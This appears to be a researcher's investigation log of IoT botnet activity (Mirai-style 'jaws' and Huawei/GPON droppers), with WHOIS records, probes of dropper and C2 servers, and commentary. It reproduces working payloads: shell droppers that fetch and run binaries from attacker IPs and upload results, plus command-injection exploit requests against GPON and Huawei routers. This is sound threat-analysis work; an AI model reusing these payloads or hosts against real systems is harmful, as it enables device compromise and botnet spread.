ofhasfhiafhoi
X19I239124UIU
oism
XSHJEHHEIIHWO
olsVNwo12
DeportedDeported
XkTer0GbA1
onry0v03
FortniteDownLOLZ
Y0urM0mGay
pussyfartlmaojk
GrAcEnIgGeRaNn
YvdGkqndCO
qGeoRBe6BE
GuiltyCrown
ZEuS69
s4beBsEQhd
HOHO-KSNDO
ZEuz69
sat1234
aj93hJ23
scanHA
alie293z0k2L
scanJoshoARM
HellInSide
ayyyGangShit
scanJoshoARM5
HighFry
b1gl
scanJoshoARM6
IWhPyucDbJ
boatnetz
scanJoshoARM7
IuYgujeIqn
btbatrtah
scanJoshoM68K
JJDUHEWBBBIB
scanJoshoMIPS
JSDGIEVIVAVIG
cKbVkzGOPa
scanJoshoMPSL
ccAD
scanJoshoPPC
KAZEN-OIU97
chickenxings
scanJoshoSH4
yakuskzm8
KAZEN-PO78H
cleaner
scanJoshoSPC
KAZEN-U79OL
dbeef
scanJoshoX86
yakuz4c24
KETASHI32
ddrwelper
scanarm5
zPnr6HpQj2
Kaishi-Iz90Y
deexec
scanarm6
zdrtfxcgy
Katrina32
doCP3fVj
scanarm7
zxcfhuio
Ksif91je39
scanm68k
Kuasa
dvrhelper
scanmips
KuasaBinsMate
eQnOhRk85r
scanmpsl
LOLHHHOHOHBUI
eXK20CL12Z
mezy
QBotBladeSPOOKY
hikariwashere
p4029x91xx
32uhj4gbejh
a.out
lzrd
PownedSecurity69
.ares
fxlyazsxhy
jnsd9sdoila
yourmomgaeis
sdfjiougsioj
Oasis
SEGRJIJHFVNHSNHEIHFOS
apep999
KOWAI-BAdAsV
KOWAI-SAD
jHKipU7Yl
airdropmalware
your_verry_fucking_gay
Big-Bro-Bright
sefaexec
shirololi
eagle.
For-Gai-Mezy
0x6axNL
cloqkisvspooky
myth
SwergjmioG
KILLEJW(IU(JIWERGFJGJWJRG
Hetrh
wewrthe
IuFdKssCxz
jSDFJIjio
OnrYoXd666
ewrtkjoketh
ajbdf89wu823
AAaasrdgs
WsGA4@F6F
GhostWuzHere666
BOGOMIPS
sfc6aJfIuY
Demon.
xeno-is-god
ICY-P-0ODIJ
gSHUIHIfh
wrgL
hu87VhvQPz
dakuexecbin
TacoBellGodYo
loligang
Execution
orbitclient
Amnesia
Owari
UnHAnaAW
z3hir
obbo
miori
eagle
doxxRollie
lessie.
hax.
yakuza
wordminer
minerword
SinixV4
hoho
g0dbu7tu
orphic
furasshu
horizon
assailant
Ares
Kawaiihelper
ECHOBOT
DEMONS
kalon
Josho
daddyscum
akira.ak
Hilix
daku
Tsunami
estella
Solar
rift
_-255.Net
Cayosin
Okami
Kosha
bushido
trojan
shiina
Reaper.
Corona.
wrgnuwrijo
Hari
orage
fibre
galil
stresserpw
stresser.pw
Tohru
Omni
kawaii
Frosti
sxj472sz
HU6FIZTQU
PFF1500RG
plzjustfuckoff
nvitpj
elfLoad
Amakano
tokupdater
cum-n-go
oblivion
Voltage
scanppc
A Leafeon is listening on your device
inetnum: 117.194.0.0 - 117.195.255.255
netname: BB-Multiplay
descr: Broadband Multiplay Project, O/o DGM BB, NOC BSNL Bangalore
country: IN
admin-c: BH155-AP
tech-c: DB374-AP
abuse-c: AB1061-AP
status: ALLOCATED NON-PORTABLE
mnt-by: MAINT-IN-DOT
mnt-irt: IRT-BSNL-IN
last-modified: 2021-07-15T07:19:01Z
source: APNIC
irt: IRT-BSNL-IN
address: Internet Cell
address: Bharat Sanchar Nigam Limited.
address: 8th Floor,148-B Statesman House
address: Barakhamba Road, New Delhi - 110 001
e-mail: abuse1@bsnl.co.in
abuse-mailbox: abuse1@bsnl.co.in
admin-c: NC83-AP
tech-c: CGMD1-AP
auth: # Filtered
remarks: abuse1@bsnl.co.in was validated on 2022-05-12
mnt-by: MAINT-IN-DOT
last-modified: 2022-05-12T10:21:35Z
source: APNIC
$ curl -i 117.195.86.34:34673
HTTP/1.1 200 OK
Server: nginx
Content-Length: 135784
Connection: close
Content-Type: application/zip
$ curl -i http://107.182.129.226
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2022 19:30:36 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 03 Sep 2022 15:44:45 GMT
ETag: "270-5e7c7b9d3f067"
Accept-Ranges: bytes
Content-Length: 624
Vary: Accept-Encoding
Content-Type: text/html
rm -rf a3; curl http://107.182.129.226/uwu/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 107.182.129.226:9832 -T a;
rm -rf a2; curl http://107.182.129.226/uwu/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 107.182.129.226:9832 -T b;
rm -rf a1; curl http://107.182.129.226/uwu/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 107.182.129.226:9832 -T c;
rm -rf a6; curl http://107.182.129.226/uwu/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 107.182.129.226:9832 -T d;
rm -rf a9; curl http://107.182.129.226/uwu/mipsel > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 107.182.129.226:9832 -T e;
Index of /a
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] arm 2022-08-13 14:14 55K
[ ] arm5 2022-08-13 14:14 47K
[ ] arm6 2022-08-13 14:14 64K
[ ] arm7 2022-08-13 14:14 126K
[ ] m68k 2022-08-13 14:14 55K
[ ] mips 2022-08-13 14:14 72K
[ ] mpsl 2022-08-13 14:14 72K
[ ] ppc 2022-08-13 14:14 55K
[ ] sh4 2022-08-13 14:14 51K
[ ] spc 2022-08-13 14:14 59K
[TXT] wget.sh 2022-08-13 04:21 285
[ ] x86 2022-08-13 14:14 50K
══════════════════════════════════════════════════════════════
Apache/2.4.29 (Ubuntu) Server at 107.182.129.226 Port 80
Index of /uwu
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] arm 2022-08-13 08:07 55K
[ ] arm5 2022-08-13 08:07 47K
[ ] arm6 2022-08-13 08:07 64K
[ ] arm7 2022-08-13 08:07 126K
[ ] m68k 2022-08-13 08:07 55K
[ ] mips 2022-08-13 08:07 72K
[ ] mpsl 2022-08-13 08:07 72K
[ ] ppc 2022-08-13 08:07 55K
[ ] sh4 2022-08-13 08:07 51K
[ ] spc 2022-08-13 08:07 59K
[ ] x86 2022-08-13 08:07 50K
══════════════════════════════════════════════════════════════
Apache/2.4.29 (Ubuntu) Server at 107.182.129.226 Port 80
C2 server:
$ cat contained_uwu.txt | grep -E "DST=.*DPT=" | sed -r "s/^.* DST=([^ ]*) .* DPT=([0-9]+) .*$/\1:\2/g" | sort | uniq -c | sort -g | tail -n 10
2 191.75.115.13:23
2 206.178.221.254:23
2 40.174.62.64:23
2 45.174.28.54:23
2 54.91.196.133:23
2 67.78.63.43:23
2 72.105.154.36:23
2 81.103.105.180:23
2 93.155.124.67:23
493 156.96.151.226:7854
NetRange: 156.96.0.0 - 156.96.255.255
CIDR: 156.96.0.0/16
NetName: NEWTREND
NetHandle: NET-156-96-0-0-1
Parent: NET156 (NET-156-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: NEWTREND (NEWTRE)
RegDate: 1991-12-23
Updated: 2021-12-14
Ref: https://rdap.arin.net/registry/ip/156.96.0.0
OrgName: NEWTREND
OrgId: NEWTRE
Address: FastLink Network - Newtrend Division
Address: P.O. Box 17295
City: Encino
StateProv: CA
PostalCode: 91416
Country: US
RegDate: 1991-12-23
Updated: 2011-09-24
Ref: https://rdap.arin.net/registry/entity/NEWTRE
Output of malware to 156.96.151.226:7854 (see: https://bcable.net/analysis-ukr-miori_fail.html)
< 00000000 33 66 99 05 00 # 3f...
echo -e "\x33\x66\x99\x05\x00" | socat -ddd - tcp:156.96.151.226:7854
2022/09/17 16:39:38 socat[282837] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2022/09/17 16:39:38 socat[282837] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2022/09/17 16:39:38 socat[282837] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2022/09/17 16:39:38 socat[282837] N reading from and writing to stdio
2022/09/17 16:39:38 socat[282837] N opening connection to AF=2 156.96.151.226:7854
2022/09/17 16:39:38 socat[282837] I starting connect loop
2022/09/17 16:39:38 socat[282837] I socket(2, 1, 6) -> 5
2022/09/17 16:39:38 socat[282837] N successfully connected from local address AF=2 10.2.0.2:60078
2022/09/17 16:39:38 socat[282837] I resolved and opened all sock addresses
2022/09/17 16:39:38 socat[282837] N starting data transfer loop with FDs [0,1] and [5,5]
2022/09/17 16:39:38 socat[282837] I transferred 6 bytes from 0 to 5
2022/09/17 16:39:38 socat[282837] N socket 1 (fd 0) is at EOF
2022/09/17 16:39:38 socat[282837] I shutdown(5, 1)
2022/09/17 16:39:38 socat[282837] W read(5, 0x5581670a4000, 8192): Connection reset by peer
2022/09/17 16:39:38 socat[282837] N socket 2 to socket 1 is in error
2022/09/17 16:39:38 socat[282837] N socket 2 (fd 5) is at EOF
2022/09/17 16:39:38 socat[282837] I shutdown(5, 2)
2022/09/17 16:39:38 socat[282837] I shutdown(5, 2): Transport endpoint is not connected
2022/09/17 16:39:38 socat[282837] N exiting with status 0
Normally you should see something after the “shutdown” command, which only shuts down the write stream. Tried a few different ways including netcat and by hand, nothing. I’m pretty sure these are just callbacks now to detect infected nodes. I see no way these can be actual logins into anything. This whole system has to be a ruse, or just a waste of time. It could also already have been sinkholed, I ran nmap
and all the ports are open, so that looks like software that just blackholes everything defensively which is common for all of these particular malware strains. When they get knocked offline they don’t get sinkholed in that way, they get taken down completely and everything is blocked and closed. Then again, this is a different datacenter, so who knows. For now unless I get further information, my conclusion is this is just a callback to detect infected nodes.
neverwinwlaq.xyz. 572 IN A 52.231.30.204
NetRange: 52.224.0.0 - 52.255.255.255
CIDR: 52.224.0.0/11
NetName: MSFT
NetHandle: NET-52-224-0-0-1
Parent: NET52 (NET-52-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Microsoft Corporation (MSFT)
RegDate: 2015-11-24
Updated: 2021-12-14
Ref: https://rdap.arin.net/registry/ip/52.224.0.0
$ curl -i http://52.231.30.204/nwww/
HTTP/1.1 200 OK
Date: Mon, 19 Sep 2022 16:17:07 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 04 Sep 2022 12:54:36 GMT
ETag: "0-5e7d97724734c"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
When trying to dump the rest of the binaries in the jaws
file, oddly these were not available:
--2022-09-19 11:18:50-- http://52.231.30.204/nwww/nww.m68k
Connecting to 52.231.30.204:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2022-09-19 11:18:51 ERROR 403: Forbidden.
--2022-09-19 11:18:51-- http://52.231.30.204/nwww/nww.spc
Connecting to 52.231.30.204:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2022-09-19 11:18:51 ERROR 403: Forbidden.
--2022-09-19 11:18:51-- http://52.231.30.204/nwww/nww.i686
Connecting to 52.231.30.204:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2022-09-19 11:18:52 ERROR 404: Not Found.
--2022-09-19 11:18:52-- http://52.231.30.204/nwww/nww.sh4
Connecting to 52.231.30.204:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2022-09-19 11:18:52 ERROR 403: Forbidden.
--2022-09-19 11:18:52-- http://52.231.30.204/nwww/nww.arc
Connecting to 52.231.30.204:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2022-09-19 11:18:53 ERROR 403: Forbidden.
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
After UPX decompression, it appears to be more Huawei attacks:
POST /GponForm/diag_Form?style/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://52.231.30.204/gpon443+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g neverwinwlaq.xyz -l /tmp/.hiroshima -r /nwww/nww.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+ neverwinwlaq.xyz/jaws;sh+/tmp/jaws HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
inetnum: 185.216.71.0 - 185.216.71.255
netname: NETERRA-Serverion_BV-NET
country: NL
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
mnt-lower: mnt-nl-descapital-1
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
status: ASSIGNED PA
mnt-by: MNT-NETERRA
created: 2022-05-31T14:54:39Z
last-modified: 2022-07-28T11:49:01Z
source: RIPE
role: Serverion B.V.
address: Krammer 8
address: 3232 HE Brielle
address: Netherlands
phone: +31851308333
org: ORG-DCB8-RIPE
abuse-mailbox: abuse@serverion.com
nic-hdl: SB27731-RIPE
mnt-by: mnt-com-serverion
created: 2020-03-17T15:49:34Z
last-modified: 2020-03-17T15:52:30Z
source: RIPE # Filtered
$ curl -i http://185.216.71.192/
HTTP/1.1 200 OK
Date: Mon, 19 Sep 2022 16:29:42 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 11 Sep 2022 09:18:01 GMT
ETag: "0-5e86341806e64"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://185.216.71.192/ma/
HTTP/1.1 200 OK
Date: Mon, 19 Sep 2022 16:28:48 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 11 Sep 2022 09:18:01 GMT
ETag: "0-5e863418085d4"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
--2022-09-19 11:27:42-- http://185.216.71.192/ma/meihao.arc
Connecting to 185.216.71.192:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2022-09-19 11:27:42 ERROR 404: Not Found.
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
Again, UPX, then Huawai attacks…
POST /GponForm/diag_Form?style/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://185.216.71.192/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.216.71.192 -l /tmp/.hiroshima -r /ma/meihao.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
inetnum: 92.207.0.0 - 92.207.255.255
org: ORG-GTL19-RIPE
netname: UK-GTL-20071017
country: GB
admin-c: MM36760-RIPE
tech-c: MM36760-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-by: MNT-GTL
mnt-routes: MNT-GTL
mnt-domains: MNT-GTL
created: 2014-12-22T10:42:51Z
last-modified: 2017-10-04T09:24:17Z
source: RIPE
organisation: ORG-GTL19-RIPE
org-name: Gamma Telecom Limited
country: GB
org-type: LIR
address: Kings House, Kings Road West
address: Newbury
address: RG14 5BY
address: UNITED KINGDOM
phone: +441618703366
fax-no: +441618775704
abuse-c: GAC-GB
mnt-ref: MNT-GTL
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
mnt-by: MNT-GTL
created: 2013-05-14T10:35:14Z
last-modified: 2022-07-26T20:42:34Z
source: RIPE # Filtered
$ curl -i http://92.207.203.157/
HTTP/1.1 200 OK
Date: Mon, 19 Sep 2022 16:46:41 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/���� DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
catAPIVersion: 2.001
Set-Cookie: PHPSESSID=n4dmj6rnjostg2r6fus97h2qd5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=n4dmj6rnjostg2r6fus97h2qd5; path=/
Set-Cookie: PHPSESSID=c1k8li7psftj38hfkhaf1b8rp6; path=/
Vary: Accept-Encoding
Content-Length: 3557
Content-Type: text/html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="ISO-8859-1">
<!-- <meta name="HandheldFriendly" content="true"> -->
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
<!-- <meta name="apple-mobile-web-app-capable" content="yes"> -->
<!-- <meta name="apple-mobile-web-app-status-bar-style" content="black"> -->
<link rel="shortcut icon" href="/favicon.ico">
<!-- <link rel="apple-touch-icon" href="/images/apple_icon.png"/> -->
<title>40_CAT_1332</title>
DSS Unit - 40_CAT_1332 (92.207.203.157)
This site requires that Javascript and Cookies be enabled in your browser.
Please enable and refesh this page.
Copyright © 2012 Cathexis Technologies (Pty) Ltd
support@cat.co.za
Version 2.001
$ curl -i http://92.207.203.157/x/
HTTP/1.1 200 OK
Date: Mon, 19 Sep 2022 16:44:58 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/���� DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
2sh
file had these not found:
--2022-09-19 11:37:30-- http://92.207.203.157/x/irq1
Connecting to 92.207.203.157:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2022-09-19 11:37:30 ERROR 404: Not Found.
--2022-09-19 11:37:30-- http://92.207.203.157/x/irq2
Connecting to 92.207.203.157:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2022-09-19 11:37:30 ERROR 404: Not Found.
keikaku doori!
You again??
NetRange: 107.182.128.0 - 107.182.131.255
CIDR: 107.182.128.0/22
NetName: AS-SERVERION
NetHandle: NET-107-182-128-0-1
Parent: NET107 (NET-107-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS213035
Organization: Serverion LLC (SL-2034)
RegDate: 2021-03-31
Updated: 2021-05-12
Comment: Serverion NOC - https://noc.serverion.com
Comment: Looking Glass - https://lg.serverion.com
Comment: Information: https://www.serverion.com
Comment: https://as213035.net
Comment: Spam & Abuse - abuse@serverion.com
Comment: Peering - peering@serverion.com
Ref: https://rdap.arin.net/registry/ip/107.182.128.0
OrgName: Serverion LLC
OrgId: SL-2034
Address: 600 N. Broadstreet, Suite 5#3252
City: Middleton
StateProv: DE
PostalCode: 19709
Country: US
RegDate: 2020-08-10
Updated: 2022-07-24
Comment: Serverion NOC - https://noc.serverion.com
Comment: Looking Glass - https://lg.serverion.com
Comment: Information: https://www.serverion.com
Comment: https://as213035.net
Comment: Spam & Abuse - abuse@serverion.com
Comment: Peering - peering@serverion.com
Ref: https://rdap.arin.net/registry/entity/SL-2034
$ curl -i http://107.182.129.239
HTTP/1.1 200 OK
Date: Mon, 19 Sep 2022 16:45:13 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Fri, 16 Sep 2022 03:47:12 GMT
ETag: "2aa6-5e8c3379dac44"
Accept-Ranges: bytes
Content-Length: 10918
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
2022-09-21/httpd-##bcable-redacted##-80-78.10.234.44-57559-2022-09-21T01:02:21.446889-NXOc0B:stream = [('in', b'GET /shell?cd+/tmp;rm+-rf+*;wget+networkmapping.xyz/jaws;sh+/tmp/jaws HTTP/1.1\x0d\x0aUser-Agent: Hello, world\x0d\x0aHost: 127.0.0.1:80\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x0d\x0aConnection: keep-alive\x0d\x0a\x0d\x0a'),
networkmapping.xyz. 300 IN A 20.187.116.78
NetRange: 20.180.0.0 - 20.191.255.255
CIDR: 20.180.0.0/14, 20.184.0.0/13
NetName: MSFT
NetHandle: NET-20-180-0-0-1
Parent: NET20 (NET-20-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Microsoft Corporation (MSFT)
RegDate: 2017-02-22
Updated: 2017-02-22
Ref: https://rdap.arin.net/registry/ip/20.180.0.0
$ curl -i networkmapping.xyz 16:50:03
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 23 Sep 2022 21:50:07 GMT
Content-Type: text/html
Content-Length: 1385
Last-Modified: Tue, 13 Sep 2022 05:43:17 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "63201875-569"
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
<!DOCTYPE html><html><head><title>OnlineJudge</title><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><meta http-equiv=X-UA-Compatible content="IE=edge,chrome=1"><meta name=renderer content=webkit><link rel="shortcut icon" href=/public/website/favicon.ico><link href=/static/css/loader.css rel=stylesheet><script>// IE 10 and earlier
if (window.navigator.userAgent.indexOf('MSIE ') > 0 &&
window.confirm('Your browser is not supported, click \'OK\' to update')) {
window.location = 'http://outdatedbrowser.com'
}</script><link href=/static/css/vendor.d7eb5fa53e8000d7b3455700fc1c8303.css rel=stylesheet><link href=/static/css/oj.1a28434668fc1763e43fbe78360d97e4.css rel=stylesheet></head><body><div id=app-loader><div class=square></div><div class=square></div><div class="square last"></div><div class="square clear"></div><div class=square></div><div class="square last"></div><div class="square clear"></div><div class=square></div><div class="square last"></div></div><div id=app></div><script type=text/javascript src=/static/js/vendor.dll.7d98bec.js></script><script type=text/javascript src=/static/js/manifest.31351240a507d0376953.js></script><script type=text/javascript src=/static/js/vendor.c68548dcd5b5b4a7d84d.js></script><script type=text/javascript src=/static/js/oj.538b80c5d17227ef7fe2.js></script></body></html>
Wait, that looks like a normal page…
注意事项
使用指南
新生可以在Contest找到近几年广工ACM集训队新生赛的题目。需要登录账号才能提交题目,注册后可在Settings里将界面改成中文。
由于不可抗因素导致旧OJ部分数据丢失,部分题目可能题面描述不完整,数据出错等情况。如有问题请在新生群联系管理员。
目前暂时只上传了17和18年的新生赛的部分题目,14至16年的题目估计于国庆假期后补上。19、20年的比赛请移步牛客网查看:
2019年广东工业大学腾讯杯新生程序设计竞赛(同步赛)
2021年广东工业大学第十五届文远知行杯程序设计竞赛(同步赛)
2020年广东工业大学第十届文远知行杯新生程序设计竞赛(同步赛)
Precautions
User's Guide
New students can find the questions of the recent years of the GWACM training team freshman competition in Contest. After registration, you can change the interface to Chinese in Settings.
Due to unavoidable factors, some of the old OJ data are lost, some questions may have incomplete descriptions and wrong data. If you have any questions, please contact the administrator in the freshman group.
For the time being, we have only uploaded some questions of the freshmen tournament of 17 and 18, and the questions of 14 to 16 are estimated to be added after the National Day holiday. 19 and 20 years of the tournament, please move to Niuqiu.com to view the following
2019 Guangdong University of Technology Tencent Cup Freshman Programming Competition (Synchronized Competition)
The 15th Wenyuan Zhixing Cup Programming Competition of Guangdong University of Technology in 2021 (synchronous competition)
The 10th Wenyuan Zhixing Cup Freshmen Programming Competition of Guangdong University of Technology in 2020 (synchronous competition)
So, reading between the lines, “due to unavoidable factors, some of the old OJ data are lost” means “we were hit by a wiper/ransomware attack, and it has been fixed”, given that’s what these jaws
files are from. First one that I’ve seen that is not completely down or still infected. Interesting to note that other servers still have it on an infected nodes list to spread around, I’ve noticed some delay on the shut down nodes as well with tons of repeat traffic for old taken down dropper nodes.
Example of current as of writing working “jaws” dropper server, that I just found here in my logs as well:
2022-09-20/httpd-##bcable-redacted##-80-222.116.180.106-33131-2022-09-20T01:21:20.330050-SVuDSB:stream = [('in', b'GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1\x0d\x0aUser-Agent: Hello, world\x0d\x0aHost: 127.0.0.1:80\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x0d\x0aConnection: keep-alive\x0d\x0a\x0d\x0a'),
2022-09-21/httpd-##bcable-redacted##-80-185.244.173.9-54474-2022-09-20T22:35:20.303921-IogDq9:stream = [('in', b'GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1\x0d\x0aUser-Agent: Hello, world\x0d\x0aHost: 127.0.0.1:80\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x0d\x0aConnection: keep-alive\x0d\x0a\x0d\x0a'),
2022-09-21/httpd-##bcable-redacted##-80-197.60.123.233-45636-2022-09-20T23:39:20.833821-2XDxXC:stream = [('in', b'GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1\x0d\x0aUser-Agent: Hello, world\x0d\x0aHost: 127.0.0.1:80\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x0d\x0aConnection: keep-alive\x0d\x0a\x0d\x0a'),
2022-09-21/httpd-##bcable-redacted##-80-41.37.172.226-42630-2022-09-21T00:59:21.075222-TTk2hb:stream = [('in', b'GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1\x0d\x0aUser-Agent: Hello, world\x0d\x0aHost: 127.0.0.1:80\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x0d\x0aConnection: keep-alive\x0d\x0a\x0d\x0a'),
2022-09-22/httpd-##bcable-redacted##-80-156.204.61.52-60544-2022-09-21T21:36:21.793462-MTJkju:stream = [('in', b'GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1\x0d\x0aUser-Agent: Hello, world\x0d\x0aHost: 127.0.0.1:80\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x0d\x0aConnection: keep-alive\x0d\x0a\x0d\x0a'),
2022-09-22/httpd-##bcable-redacted##-80-156.216.67.37-48623-2022-09-22T00:19:22.983648-5U8bB0:stream = [('in', b'GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1\x0d\x0aUser-Agent: Hello, world\x0d\x0aHost: 127.0.0.1:80\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x0d\x0aConnection: keep-alive\x0d\x0a\x0d\x0a'),
$ curl -i http://185.216.71.192/jaws
HTTP/1.1 200 OK
Date: Fri, 23 Sep 2022 22:09:57 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 11 Sep 2022 09:21:00 GMT
ETag: "aa4-5e8634c21f0be"
Accept-Ranges: bytes
Content-Length: 2724
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.x86; curl -O http://185.216.71.192/ma/meihao.x86; cat meihao.x86 > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.mips; curl -O http://185.216.71.192/ma/meihao.mips; cat meihao.mips > systemdas; chmod +x *; ./systemdas jaws.exploit
